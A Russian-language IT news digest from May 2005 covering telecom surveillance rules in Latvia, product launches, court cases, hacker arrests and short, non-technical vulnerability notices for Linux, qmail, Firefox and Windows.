Сейм Латвии принял поправки к закону "Об электронной связи", согласно которому все латвийские операторы телефонной связи и интернет-провайдеры обязаны за свой счет установить, обслуживать и модернизировать аппаратуру для прослушивания разговоров и контроля за интернет-трафиком в интересах правоохранительных органов и спецслужб, сообщает латвийское интернет-издание Delfi. Как отмечает издание, требование о возможности мониторинга телекоммуникационных каналов существует в законодательстве страны уже пять лет, однако вновь принятые поправки предусматривают установку операторы оборудования за свой счет и в обязательном порядке. Предприятия связи должны записывать все телефонные и интернет-переговоры и три года хранить информацию. По словам экспертов, эти меры приведут к подорожанию латвийского рынка интернет-доступа и возможному закрытию некоторых небольших операторов, так как оборудование для мониторинга и хранения собранной информации дорого и требует значительных технических мощностей. Крупные фирмы ранее уже выполнили государственные требования - по неофициальной информации газеты "Бизнес&Балтия", мобильный оператор LMT потратил на создание пункта перехвата 318 тысяч евро, а его обслуживание обходится ему в 65 тысяч евро в год. Следует отметить, что в российском законодательстве также существуют подобные требования, известные как "Система опреративно-розыскных мероприятий" (СОРМ) - российские операторы связи внедрили ее на своих мощностях около 5 лет назад.
Lenta.Ru

14/05/2005 09:10 Программист Дмитрий Скляров выиграл новый суд у НТВ
Мосгорсуд отклонил кассационную жалобу телекомпании НТВ на решение Пресненского районного суда Москвы, который удовлетворил иск программиста Дмитрия Склярова о защите чести, достоинства и деловой репутации. Суд обязал НТВ выступить с опровержением, а также выплатить Склярову 50 тысяч рублей за моральный ущерб и покрыть судебные расходы, пишет газета "Время новостей". Дмитрий Скляров, сотрудник российской компании "Элкомсофт", в июле 2001 года был арестован в Лас-Вегасе по иску американской компании Adobe. Программиста обвинили в нарушении закона об авторских правах в цифровую эпоху (DMCA). В материалах дела говорилось, что Скляров выступил с докладом на международной конференции по информационной безопасности, показав уязвимость защиты электронных книг, предлагаемой Adobe, и разработал программу их копирования. Впоследствии со Склярова сняли обвинение и освободили из-под ареста, а ответчиком по иску стала "Элкомсофт". В декабре 2002 года американский суд отклонил иск. Вскоре после ареста Склярова НТВ показала сюжеты, в которых говорилось об обыске в московской квартире программиста. Журналисты утверждали, что у Склярова изъяли документы МВД с грифом "для служебного пользования". Программист подал иск к телекомпании и выиграл дело, однако НТВ подала апелляцию, после чего дело вернули на доследование. После повторного рассмотрения дела Пресненский суд оставил свое решение в силе.
Источник

13/05/2005 09:51 Xbox 360 явилась на экранах, обскакав конкурентов
Microsoft опередила своих конкурентов по игровой консоли на стартовой черте, представив Xbox нового поколения в телевизионной программе. Софтверный гигант обошел Sony и Nintendo и первым обнародовал детали своей новой консоли Xbox 360 в телепередаче, которая транслировалась по MTV в четверг вечером. Наиболее ожидаемая особенность спецификации Xbox 360 — это изображение высокой четкости. Стоимость устройства пока не объявлена, но руководители компании сказали, что консоль поступит в продажу в Азии, Европе и Северной Америке к началу сезона рождественских продаж. Microsoft спланировала анонс так, чтобы он прозвучал до открытия крупнейшей выставки игровой индустрии Electronic Entertainment Expo, которая пройдет в Лос-Анджелесе на будущей неделе, где Sony и Nintendo, планируют демонстрировать собственные игровые системы нового поколения. Ожидается, что эти системы произведут переворот в игровой индустрии, где смена моделей консолей происходит примерно раз в пять лет. Microsoft немного опередила этот график, вероятно с тем, чтобы поскорее воспользоваться захваченным благодаря первой модели Xbox, вышедшей в 2001 году, плацдармом и атаковать конкурентов. На экране HDTV-телевизора Xbox 360 будет отображать игры с высокой четкостью, понижая качество изображения в зависимости от класса применяемого ТВ. Через встроенный порт Ethernet и канал широкополосного доступа в интернет консоль новой конструкции можно будет подключить к торговой площадке Xbox Live, откуда геймеры смогут загружать трейлеры новых игр, новые уровни, оружие, игровые транспортные средства и многое другое. Консоль будет оснащаться 20-Гбайт сменным и наращиваемым жестким диском, а также приводом для чтения двухслойных дисков DVD со скоростью 12х, поддерживающим DVD, DVD-R/RW, DVD+R/RW, CD-R/RW, WMA, MP3 и другие форматы. Данные можно будет переписывать и непосредственно из ПК под Windows ХР, сообщает ZDNet.
Подробности

13/05/2005 09:38 Следующая версия Microsoft Office появится в 2006 году
На конференции разработчиков Microsoft в Лас-Вегасе основатель компании Билл Гейтс впервые назвал предполагаемую дату релиза следующей версии MS Office. Она появится в следующем году. MS Office 2003, последняя основная версия пакета офисных программ Microsoft, появилась в конце 2003 года. О релизе следующего Office (он будет называться Office 12) представители Microsoft говорят довольно сдержанно. На конференции в Лас-Вегасе Гейтс рассказал, что усовершенствования коснутся, в частности, средств документооборота, системы управления правами, планировщика и средств совместной работы с документами. Также от Microsoft ожидают новых серверных продуктов для организации совместной работы. Например, эксперты уже обсуждают возможность появления Excel-сервера. Существующие серверные продукты в Office System включают Project Server, Portal Server и Live Communications Server. Изначально Microsoft планировали запустить Office 12 параллельно со следующей версией Windows, известной под кодовым названием Longhorn, однако дата её выпуска много раз переносилась. Сейчас в Microsoft надеются закончить работу над новой операционной системой к концу 2006 года, так что новый Office, вероятно, поступит в продажу раньше.
"Компьюлента"

13/05/2005 09:14 BBC объявила об открытии RSS-потоков для свободного использования
Британская государственная вещательная корпорация BBC объявила, что открывает для свободного использования в Интернете RSS-потоки своих новостных сообщений. Популярная интернет-технология RSS (Really Simple Syndication, "очень простая републикация") предназначена для эффективной интеграции регулярно обновляемых информационных "лент" новостей каких-либо сайтов в страницы других сайтов или в пользовательские браузеры для чтения новостей прямо в них. BBC предоставяла трансляцию RSS-потоков и раньше (начиная с 2003 года), но ограничивала условия их использования. Так, пользователи могли свободно читать RSS-ленты главной новостной службы BBC News и спортивной BBC Sport с помощью клиентских программ (главным образом, браузеров), но для републикации их на каких-либо сайтах формально требовалось заключить с BBC соглашение. Теперь ограничения сняты, и ретрансляцию можно проводить всем желающим. Обычно экспортируются только заголовки и краткое содержание новостей, для ознакомления с полными текстами необходимо перейти на сайт первоисточника (в данном случае BBC News), для чего в RSS-потоке всегда транслируется ссылка.
Подробности

12/05/2005 13:32 Уязвимость в ядрах Linux
Paul Starzetz cообщил об обнаружении локальной уязвимости в ядрах Linux версий 2.2, 2.4, 2.6. Уязвимость связана с некорректной обработкой данных в функции elf_core_dump() (файл binfmt_elf.c в исходниках ядра), предназначенной для "слепка" памяти ядра (core dump), формируемом загрузчиком исполняемых файлов формата ELF (пришёл на смену устаревшему формату a.out или COFF). Эта ошибка может позволить локальному пользователю при помощи специальным образом формированного исполняемого файла формата ELF вызвать переполнение буфера с дальнейшим выполнением проивольного кода с привилегиями ядра (kernel). В вышедшей версии 2.6.11.9 уязвимость устранена. Автором выпущен шелл-скрипт, демонстрирующий уязвимость.
Описание уязвимости

12/05/2005 13:03 Novell совершенствует защиту программ для Linux
Компания Novell приобрела компанию Immunix. Цель приобретения - усовершенствовать защиту программ Novell для Linux, сообщает linux.org.ru. Новые программы будут выходить на рынок под маркой Novell AppArmor. Компания Immunix была основана в 1998 году. В ее штате насчитывается немногим более 20 сотрудников. Основную их часть составляют программисты, создающие программами для обеспечения информационной безопасности. Соучредитель Immunix Криспин Коуэн (Crispin Cowan) входит в число разработчиков проектов Linux, также посвященных информационной безопасности. Продукт AppArmor работает в среде Linux с ядром 2.6, однако новый продукт Novell будет поддерживать только Suse Linux Enterprise Server.
Подробности

12/05/2005 12:38 Paragon локализовала первый в мире криптосмартфон
Компания Paragon Software локализовала разработку российской компании «Анкорт» — двухпроцессорный криптосмартфон. По мнению разработчиков, устройство не имеет аналогов на мировом рынке. Пакет локализации будет поставляться в комплекте с устройством в страны Европы, Арабского мира, Латинской Америки, Юго-Восточной Азии и Китай. Он содержит системы локализации LEng для национальных языков указанных рынков, адаптированные к специфике криптосмартфона. Также пакет включает переведенные брошюры «Руководство по использованию криптосмартфона» и систему оперативного распознавания многоязычного рукописного ввода PenReader для того же ассортимента языков. Криптосмартфон от «Анкорт» имеет процессор Motorola MX21, цветной жидкокристаллический сенсорный TFT дисплей с разрешением 240х320, литий-полимерный аккумулятор емкостью 1300 mAh, коммуникационные возможности, клавиатуру с латинско-кириллической раскладкой. Решение управляется ОС а WinCE Net 4.2 и включает набор предустановленного программного обеспечения. Кроме того, криптосмартфон обладает дополнительным процессором TMS 320 VC 5416 для шифрования данных и специальной кнопкой для вызова функции шифрования.
CNews

12/05/2005 12:08 Выход Firefox 1.0.4 и Mozilla 1.7.8
Mozilla Foundation выпущены новые версии браузера Mozilla Firefox (1.0.4) и комплексного продукта Mozilla (1.7.8). Напомним, что недавно были опубликованы подробности об уязвимостях в этих продуктах. Русская версия Firefox на текущий момент пока недоступна (предлагается версия 1.0.3). Что касается Mozilla, то ChangeLog тоже пока нет, однако есть упоминания о залатанных уязвимостях.
Cтраница загрузки Firefox
Страница загрузки Mozilla

12/05/2005 11:36 Сюрприз Longhorn: «красный экран смерти»
Microsoft нашла уникальное решение легендарной проблеме «синего экрана смерти» для следующей версии операционной системы Windows. Софтверный гигант добавил в Longhorn красный экран, который пользователи будут видеть при крушении системы. По словам специалиста и блоггера Microsoft Майкла Кэплина, который экспериментировал с бета-версией Longhorn, теперь перед пользователями может предстать не только «синий экран смерти», но и красный. Похоже, что красный экран смерти будет старшим и более грозным сородичем традиционного синего экрана и призван информировать пользователей о более серьезных ошибках, говорит Кэплин. Однако вряд ли многим пользователям придется столкнуться с этой проблемой. Кэплин, технический руководитель инфраструктуры глобализации, шрифтов и инструментов Microsoft, всего один раз увидел красный экран смерти, когда внес «мелкое изменение в настройки» и нарушил системный реестр. Этот «в какой-то мере разрушительный акт», по словам Кэплина, спровоцировал красный экран смерти после того, как тот перезагрузил виртуальный образ Longhorn — предыдущие версии Windows в этом случае возвращались к черному экрану с другим сообщением об ошибке. «Я не уверен, что данное изменение можно классифицировать как усовершенствование», — отмечает Кэплин.
ZDNet

12/05/2005 11:11 Прокуратура Массачусетса и Microsoft выследили злостного спамера по фамилии Куваев
Судья американского штата Массачусетс вынес решение о принудительном прекращении деятельности зарегистрированных на территории этого штата фирм 2K Services и Ecash Pay, которые, как установили следственные органы штата, несут ответственность за постоянные рассылки нескольких миллионов спамерских писем в месяц. Как передает Associated Press, было установлено, что эти фирмы являются центром одной из крупнейших спамерских сетей мира. Главным лицом, ответственным за организацию данного вида криминальной деятельности, в материалах судопроизводства значится человек по имени Лео Куваев (Leo Kuvayev), также по делу проходят шестеро его сообщников. Как известно, спам считается уголовно наказуемым преступлением по принятому более года назад закону CAN-SPAM, кроме того, прокуратура штата, выступающая в качестве обвинителя, обвиняет группу Куваева в нарушении прав потребителей Массачусетс. В ходе расследования работникам прокуратуры помогала компания Microsoft, систематизировавшая получаемый спам и отслеживавшая источники его происхождения. В запросе прокуратуры содержатся обвинения в адрес указанных фирм в том, что организуемые ими массовые рассылки незаконными методами рекламировали незаконные товары и услуги, в частности, поддельные медикаменты, контрафактное программное обеспечение и порнографию. Прокуратура требует взыскания штрафов, возмещения ущерба пострадавшим и судебных издрежек, а также компенсационных выплат.
Lenta.Ru

12/05/2005 10:55 Безработный изобрел смайлик отвращения
Новость хоть и старая, но довольно забавная. исключительно для поднятия настроения после праздников. Красноярский безработный усовершенствовал всемирно известную программу ICQ. Временно неработающий житель Красноярска Станислав Патриев рассказал корр. FederalPost, что однажды, разговаривая по «аське» с незнакомым человеком, понял, как тот ему противен. Стандартный набор из 16 картинок-смайликов, предлагаемый последней версией программы, подумал С.Патриев, не сможет выразить всю полноту эмоций, и придумал новый, семнадцатый, назвав его «блюющим». По словам красноярского патентоведа Галины Лебедевой, к которой обратился С.Патриев с просьбой зарегистрировать изобретение, подобная идея пока не приходила в голову ни одному россиянину. Но выдача патента возможна при условии, если тот оплатит услуги патентного бюро, около 5 тысяч рублей. Станислава последняя новость особенно не огорчила. Он отправил письмо создателям ICQ с предложением включить его смайлик в предлагаемые программой. Ответа пока не последовало. Станислав Патриев известен в Красноярске своими похождениями по глазному центру. Среди бела дня он забрался на крышу, и в одних трусах, несколько часов прогуливался по зданию, смотрел вниз и ел бетон. После чего был снят работниками отряда экстренного реагирования и доставлен в психлечебницу.
Источник

12/05/2005 09:50 Руководителя группы Российских хакеров поймали по логам чата
Расследования американского отдела по компьютерной безопасности при правительстве США показали, что за ряд атак на онлайновые казино и несколько попыток DoS-атак, проведенных в течении прошлого года, ответственна группа российских хакеров. Кроме того, расследование помогло пролить свет на некоторые аспекты работы хакерских групп. Преступные синдикаты действуют по всему миру, объединяясь в неформальные группы с целью взлома баз кредитных карт, нападения на онлайновые банкинговые и платежные системы, а также вымогают деньги у компаний, угрожая взломом корпоративных сайтов. Как стало известно, пять человек были арестованы в результате совместной спецоперации МВД России, ФБР США, американского отдела по компьютерной безопасности при правительстве США и независимых экспертов. Расследование выявило наличие связи между независимыми группами хакеров, более того, стали известны некоторые подробности "коммерческой деятельности" групп. В частности, при желании у хакеров можно было приобрести сеть из десятков тысяч взломаных компьютеров, известных также как бот-сетей, для проведения при помощи них различных атак. "Мы выявили много полезной информации в результате совместной операции в Росcии. Мы знали о существовании подобных сетей, но не понимали алгоритма их действия и связи между ними", - говорит Мик Дитс, руководитель отдела по компьютерной безопасности. "Международное сотрудничество оказалось очень полезным. Нам приходилось работать очень аккуратно и быстро, так как данные были очень изменчивы и противоречивы. Было абсолютно невозможно использовать общепринятые юридические нормы сотрудничества", - дополняет он. Баррет Лион, специалист по предупреждению DoS-атак, был внедрен в группу хакеров, которая была ответственна за взлом ряда интернет-магазинов и онлайн-казино. Его работа помогла следователям из отдела по компьютерной безопасности при правительстве США задержать 21-летнего российского студента Ивана Максакова в прошлом году. Это расследование помогло обезвредить одну из самых высококлассных групп в интернете, а также задержать участников еще четырех групп, аресты которых были произведены несколько дней назад. Сегодня Баррет Лион директор по информационным технологиям в компании Prolexic, специализирующейся на обнаружении и предотвращении DoS-атак, а также на мониторинге инфицированных бот-сетей. Банду хакеров удалось отследить благодаря обнаружению скрытого канала общения в хакерском ПО, найденном на одной из инфицированных машин, являвшихся частью бот-сети. Также специалисты нашли IRC-канал, используемый хакерами для общения и управления бот-сетью более чем 80 000 компьютеров. После внедрения в группу хакеров специалисты в течении нескольких месяцев отслеживали чаты, в которых обсуждались детали предстоящих атак, и создавали профили каждого из участников. Роковую ошибку совершил руководитель группы, Максаков. В результате того, что он зашел в чат, используя свой реальный IP-адрес, а не анонимайзер. Как только специалисты обнаружили его сетевой IP, узнать телефон и соответственно адрес уже не представляло.
Источник

12/05/2005 09:39 Google поспешил отключить "ускоритель интернета"
"Ускоритель интернета" от Google не проработал и недели. Программу Google Web Accelerator больше нельзя скачать. Официальное объяснение: мощности имеющих серверов исчерпаны. Впрочем, есть все основания полагать, что "ускоритель" убран из-за обнаружившихся в нём недоработок. Открытое бета-тестирование Google Web Accelerator было начато на прошлой неделе. Перед использованием сервиса на компьютер нужно установить специальную клиентскую программу. Для ускорения загрузки веб-страниц, она сохраняет самые частопосещаемые страницы, а их изменившиеся фрагменты получает в сжатом виде со специальных серверов Google. В загруженных страницах Web Accelerator находит ссылки на другие страницы и заранее скачивает их. Так экономится до нескольких секунд на загрузке каждой страницы. По сути, Google вызвался стать всемирным прокси-сервером. Если бы Google Web Accelerator получил популярность, большинство пользователей интернета получали бы страницы не напрямую, а через Google. Предсказать возмущение защитников тайны частной жизни было нетрудно. Google Web Accelerator позволит Google узнать о своих пользователях всё. Компании будет известно, на какие сайты ходят люди, и что они там делают. Зачем это ей? Извлечь деньги из Google Web Accelerator вряд ли возможно. Компания распространяет свои программы бесплатно, а зарабатывать на рекламе с помощью "ускорителя интернета" вряд ли возможно. А ведь для работы Google Web Accelerator потребуются колоссальные ресурсы, ведь запросы, которые сейчас распределяются по миллионам серверов в интернете, будут обслуживать сервера одного Google. Однако до этого не дошло: быстро выяснилось, что использование программы может вызвать проблемы, о которых её разработчики, похоже, и не подозревали. Первые жалобы стали поступать через считанные часы. Завсегдатаи форумов и других веб-приложений обнаруживали, что через Google Web Accelerator видят страницы, где они зарегистрированы не под своим именем. Google кэшировал страницу, которую запросил один пользователь и возвращал её всем остальным.
Подробности

11/05/2005 22:28 За хакерские атаки - восемь месяцев тюрьмы
Бывший сотрудник Национальной лаборатории в Лос-Аламосе, 25-летний житель калифорнийского города Санта-Моника Джером Хекенкамп проведет восемь месяцев в тюрьме за хакерские атаки и повреждение компьютеров нескольких американских хай-тек-компаний, в том числе Интернет-аукциона eBay. Он также выплатит компенсацию в размере $268 291 и не имеет права использовать компьютер с доступом в Интернет без специального разрешения. По словам Хекенкампа, в феврале и марте 1999 года он атаковал компьютеры компании eBay, изменил внешний вид ее сайта и установил на серверы вредоносные программы, которые собирали логины и пароли пользователей. Хакера арестовали в январе 2001 года, когда он уже работал в Национальной лаборатории. После ареста Хекенкамп был вынужден ее покинуть.
Crime-Research.Ru

11/05/2005 16:22 Из-за проблем с DNS Google выключился на 15 мину
Около полуночи с 7 на 8 мая сайт поискового гиганта Google был недоступен пользователям всего мира. Как сообщил прессе David Krane, представитель компании Google "это не было нападением хакеров или проблемой системы безопасности." Причиной всему, по его словам, стал сбой в работе системы доменных имен (Domain Name System, DNS), которая преобразует доменные имена в IP-адреса. И если "ложится" система DNS, то запрашиваемые сайты не грузятся или загружаются очень долгое время. "В течение 15-20 минут сервисы Google, такие как Gmail, Google News, Froogle, Google Images, Google Groups и Google Local были недоступны. Наблюдались ошибки в работе сервиса Google AdSense," сказал Krane. "Мы приняли меры и доступ к Google был восстановлен." Версия о взломе поисковой системы Google отпадает, поскольку при недоступности через http://www.google.com он оставался видимым, например, через http://216.239.39.99.
Источник

11/05/2005 15:12 Взломан официальный сайт Тимошенко
Официальный сайт премьер-министра Украины Юлии Тимошенко www.tymoshenko.com.ua был взломан недоброжелателями. На страничке «Фотоальбом» была заменена одна из фотографий, вместо которой появилась подпись недоброжелателей. Изменения коснулись как украинской, так и русской и английской версии сайта, передает «ain.com.ua». Остальные фотографии не затронуты. Кроме этого добавлено сообщение в раздел новостей и надпись в раздел «прямое общение». Каких-либо разъяснений относительно обстоятельств этого события пока в прессе не появилось.
Некое подобие зеркала

11/05/2005 14:16 Philips будет использовать программы от Microsoft
Компания Microsoft объявила о согласии компании Philips использовать программное обеспечение от Microsoft для работы с цифровым аудио и видео контентом на своей электронике. Представитель Philips сообщил, что будет поддерживать формат Windows Media и технологию DRM (digital rights management) от компании Microsoft в своих портативных аудио и видео плеерах. Кроме того, компания Philips подчеркнула, что она планирует встраивать поддержку формата Windows Media и технологии DRM в мультимедийные чипсеты, использующиеся в различных цифровых устройствах, например в мобильных телефонах с поддержкой видео, медиаплеерах и телевизионных приставках. Также стало известно, что компания Philips рассчитывает на большой рост рынка цифровых устройств, работающих с мультимедиа и считает начало сотрудничества с Microsoft своевременным.
Mobile-Review

11/05/2005 13:02 AOL создала бесплатный почтовик
AOL открывает сервис бесплатной электронной почты. Как сообщает Associated Press, это попытка компании дистанцироваться от упадочного бизнеса по предоставлению услуг по подписке. Почтовый сервис будет интегрирован с программной интернет-пейджинга AOL Instant Messenger. Прибыль будет извлекаться засчет размещения рекламных баннеров в почтовом интерфейсе. Каждому пользователю почтовика от AOL предоставляется 2 гигабайта под корреспонденцию. В отличие от прошлой версии постового сервиса AOL, где новые сообщения хранились 27 дней, а прочитанные — всего неделю, в новой версии срок хранения писем не ограничен.
"Вебпланета"

11/05/2005 12:30 Microsoft Security Advisories
MS анонсировала запуск службы Microsoft Security Advisories, в рамках которой будует публиковаться информация, выходящая за рамки традиционных бюллетеней безопасности - например, посвященная новым возможностям выпускаемого ПО, или проблемам, устранимым с помощью настройки, сообщает bugtraq.ru. Майская порция включает информацию о настройках по умолчанию в Windows Media Player, позволяющих открывать веб-страницы без вмешательства пользователей, и напоминание о появлении поддержки tar pit (техника принудительного замедления ответов на smtp-запросы определенного вида) в Windows 2003 SMTP Server.
Подробности

11/05/2005 12:12 MasterCard наступает на фишинг-сайты
Компания MasterCard International Inc. закрыла около 1400 фишинг-сайтов и более 750 сайтов, владельцев которых подозревали в незаконной торговле информацией о кредитных картах. Указанные действия были проделаны в рамках программы по борьбе с хищениями идентификационных данных, запущенной в июне прошлого года, сообщает сайт Security Pipeline. В рамках программы было выявлено и своевременно защищено около 35 тысяч номеров карт MasterCard, владельцы которых рисковали стать жертвой похитителей идентификационных данных. Программа MasterCard называется «Прекратите это» (Stop It) и проводится совместно с компанией NameProtect Inc., специализирующейся на защите цифровых данных и выявлении онлайновых афер. NameProtect непрерывно отслеживает появление новых доменных имен и сайтов, контролирует форумы и чаты, а также содержание спам-писем. Таким образом компания выявляет готовящиеся фишинг-атаки и другие формы онлайнового мошенничества. По материалам своих наблюдений NameProtect предоставляет эксклюзивные своевременные отчеты MasterCard. В свою очередь, MasterCard сообщает о незаконных сайтах и других онлайн-угрозах правоохранительным органам и издает предупреждения для финансовых институтов. На прошлой неделе MasterCard сумела закрыть фишинг-сайт в течение 15 минут, рассказал представитель компании Серджио Пинон (Sergio Pinon). Как правило, мошенники после закрытия своих ресурсов спешат обратиться за поддержкой к другим провайдерам. Преступники отказываются от своих намерений после того, как их ресурсы закрывают 2-3 раза.
VirusList

11/05/2005 11:49 Microsoft устранила опасную дыру в Windows
Корпорация Microsoft опубликовала на своем сайте очередной бюллетень безопасности MS05-024, содержащий информацию о новой дыре в операционных системах Windows, сообщает "Компьюлента". Брешь, о которой идет речь, присутствует в компоненте Web View оболочки Windows Explorer. Проблема связана с некорректной обработкой определенных символов в сформированных особым образом файлах. Злоумышленнику необходимо вынудить жертву открыть такой файл в режиме предварительного просмотра. Результатом атаки может стать выполнение произвольного вредоносного кода на удаленном компьютере. Уязвимость была охарактеризована специалистами Microsoft как важная. Дыра присутствует в операционных системах Windows 2000 с третьим и четвертым сервис-паками, а также Windows 98, Windows 98 SE и Windows Millennium Edition. Более подробную информацию можно найти на этой веб-странице. Одновременно с майским бюллетенем безопасности софтверный гигант выпустил обновленную версию своей бесплатной утилиты для удаления наиболее опасных вредоносных программ, таких как Blaster, Sasser и Mydoom.
MS05-024

11/05/2005 11:28 Intel создает свою группу по Open Source
Компания Intel создала группу, которая основательно займется вопросами операционной системы Linux и другого программного обеспечения с открытым кодом. Майкл Хулихан (Michael Houlihan), репортер Intel, подтвердил создание Open Source Program Office и во вторник сообщил, что лидером группы стал Йон Борк (Jon Bork), ранее генеральный менеджер группы домашних продуктов. Новая группа станет работать аналогично подразделению, занимающемуся связями компании с Microsoft. Борк будет выступать главным в контактировании Intel с Linux-поставщиками и другими Open Source-компаниями.
Nixp.Ru

11/05/2005 10:43 Apache затевает проект open-source Java
Группа Apache Foundation предложила создать версию open-source среды исполнения Java для настольных ПК —Sun Microsystems пока поддерживает этот план. Проект Harmony, официально предложенный в пятницу, нацелен на создание с нуля версии программного обеспечения Java 2 Standard Edition (J2SE), необходимого для исполнения Java-программ на настольных ПК. Его предложили члены проекта Apache — группы, стоящей за несколькими популярными продуктами open-source, — и другие программисты, участвовавшие в разработке Java. Они намерены создать виртуальную машину Java, сопутствующие библиотеки и тестовое ПО — все это будет доступно по лицензии open-source Apache. Если план будет принят, результатом станет то, чего разработчики open-source и другие добиваются уже много лет, но Sun отказывает им в этом. В плане и FAQ проекта Harmony говорится, что существует «широкая заинтересованность сообщества» в создании версии open-source J2SE. Project Harmony не намерен непосредственно конкурировать с Sun и будет применять такой процесс приемки кода, чтобы избежать юридических проблем. Группа взялась за проект именно сейчас потому, что Sun изменила правила процесса стандартизации Java, Java Community Process, чтобы лучше приспособить его к ПО open-source.
О проекте Harmony

10/05/2005 18:41 Обзор новшеств FreeBSD 5.4
На сайте opennet.ru опубликован обзор новшеств, которые появились в вышедшем 9 мая нового релиза популярной ОС FreeBSD. Изменения приводятся относительно версии 5.3.
Обзор

10/05/2005 14:58 Две критические уязвимости в браузере Firefox 1.0.3
Две уязвимости, найденные в популярном открытом web-браузере Mozilla Firefox, удостоились ранга «крайне критических» в связи с появлением эксплоита, с помощью которых злоумышленник может ими воспользоваться. По сообщению экспертов по безопасности из Secunia, найденным в Firefox 1.0.3 уязвимостям (cross-site scripting и удаленный доступ к системе) могут быть подвержены и другие версии браузера.Первая ошибка связана с проверкой значения URL'а в «IFRAME» для JavaScript — из-за нее возможно выполнение произвольного HTML-кода или скрипта в текущей сессии пользователя в контексте любого сайта. Вторая — в параметре IconURL в InstallTrigger.install() — позволяет атакующему получить пользовательские привилегии на системе. Самым простым решением проблемы, рекомендуемым Mozilla Foundation, является временное отключение поддержки JavaScript в Firefox.
Nixp.Ru

10/05/2005 14:30 Выход FreeBSD 5.4
Как сообщает linux.org.ru, на ftp-серверах уже появились образы FreeBSD 5.4. Это второй релиз после стабилизации пятой ветки. Как известно, первым релизом RELENG_5 был 5.3, вышедший в конце прошлого года.
ISO-образы
Анонс

10/05/2005 13:56 Уязвимости в qmail
Cообщается о наличии уязвимостей в популярном MTA qmail (в 64-битной версии). Первая уязвимость связана с целочисленным переполнением в функции stralloc_readyplus(). Удаленный пользователь может подключиться к SMTP службе и послать большое количество данных, что приведет к аварийному завершению работы службы. Вторая связана с возможностью переполнения буфера в SMTP-службе при обработке параметров команды HELO. Удаленный пользователь может вызвать отказ в обслуживании сервиса. Уязвимость существует в файле 'commands.c'. Третья уязвимость связана с возможностью переполнения буфера в файле 'qmail_put/substdio_put'. Удаленный пользователь может с помощью специально сформированной команды RCPT TO вызвать отказ в обслуживании приложения. Обнаружил уязвимости известный ислледователь компьютерной безопасности Георгий Гунински. Им же выпущены эксплоиты уязвимостей. На настоящий момент патчей пока не существует.
Описание

10/05/2005 12:50 Китайские и южнокорейские хакеры объявили кибервойну Японии
Антияпонские демонстрации проходят не только на улицах китайских городов, но и в сети Интернет, с той только разницей, что там они похожи, скорее, на кибервойну, чем на гражданские акции протеста. Как сообщает MSNBC, за последние несколько месяцев от хакерских атак пострадали крупнейшие японские сайты, как общественные, так и частные. Эксперты уверены, что нападения были инициированы киберхулиганами из Китая и Южной Кореи. По информации софтверных компаний и наблюдателей, хакерские атаки привели к финансовым издержкам и нарушили работу некоторых правительственных организаций, коммерческих структур и религиозных центров. Впрочем, осведомленные источники, на которых ссылается интернет-ресурс, затруднились сообщить точные данные потерь, ограничившись перечислением сайтов, оказавшись под особенно пристальным вниманием хакеров. В списке оказалась полиция, Министерства обороны и иностранных дел. В последние месяцы принадлежащие им интернет-ресурсы "падали" неоднократно. Жертвами хакеров стали многие университеты Страны восходящего солнца. А на сайте китайского подразделения концерна Sony Corp. виртуальные хулиганы разместили антияпонские ругательства на китайском. В последние недели плохо загружалась и страничка храма "Ясукуни" - мемориала японцам, погибшим в годы Второй мировой войны. Работу серверов затруднили миллионы писем, отправленные на адрес храма. Последняя интернет-битва произошла 1 мая. Нападению подвергся сайт японского посольства в Пекине. Масштаб нынешнего конфликта в Интернете сопоставим с американо-китайской кибервойной 2001 года, уверены аналитики. Напомним, что в апреле того года китайские (или прокитайски настроенные) хакеры начали в массовом порядке взламывать американские сайты и оставлять на них антиамериканские сообщения, китайскую символику и тексты в память о китайском летчике Ван Вее, считающимся погибшим в столкновении с американским самолетом-разведчиком. Всего было испорчено более тысячи веб-ресурсов, зарегистрированных в Соединенных Штатах.
Lenta.ru

10/05/2005 11:44 Mobile Security 4.0: защита для смартфонов от Symantec
Компания Symantec анонсировала новый программный продукт Mobile Security 4.0 разработанный для операционной системы Symbian. Mobile Security 4.0 предоставляет интегрированные антивирусные и файрвол-технологии для защиты смартфонов, работающих под операционными системами Series 60 и Series 80, таких как Nokia 9300 и Nokia 9500. Компания считает, что смартфоны всё больше используются для тех же задач, что и ноутбуки, подвергаясь таким образом той же опасности. Symantec был крайне удивлён результатами проведённого им исследования, которое показало, что пользователи смартфонов не перестают использовать новые возможности несмотря на опасность вирусов и хакерских атак. Теперь разработчики из Symantec показали, что могут не только удивляться проблемам, но и решать их. Mobile Security 4.0 доступен в версиях для потребителей и для предприятий, доступна также двухмесячная триал-версия на сайте Symbian. Розничная цена составляет $44,95. Mobile Security 4.0 предоставляет возможность автоматической и по требованию антивирусной проверки файлов, хранящихся на смартфоне, в то время как файрвол предотвращает попытки соединения как исходящие, так и внешние, а так же разрешает или блокирует их основываясь на списке правил. Для предприятий программный продукт предоставляет возможность гибкого управления и контроля для администраторов и пользователей.
Mobile-Review

10/05/2005 11:27 Бывший президент Suse покидает Novell
В понедельник производитель ПО компания Novell объявила о том, что Ричард Зейбт, бывший президент Suse Linux, подал в отставку. С тех пор как Novell приобрела Suse в январе 2004 года, Зейбт занимал пост президента отделения Novell ЕМЕА (Европа, Ближний Восток и Африка). За это время операционная система Novell Suse Linux стала продуктом номер два на рынке, уступая только конкурирующей ОС Linux от Red Hat. До прихода в Suse в 1993 году Зейбт был членом правления United Internet, а до этого занимал разные должности в отделах продаж, маркетинга и развития бизнеса IBM. Председатель совета директоров Novell Джек Мессман отмечал, что Зейбт — особенно ценное приобретение в результате слияния Suse с Novell. Предполагается, что его обязанности будет исполнять Рон Овсепян (Ron Hovsepian), назначенный на прошлой неделе президентом Novell по деятельности региональных отделений.
ZDNet

10/05/2005 10:26 Главным подозреваемым по делу о краже кода у Cisco проходит шведский подросток
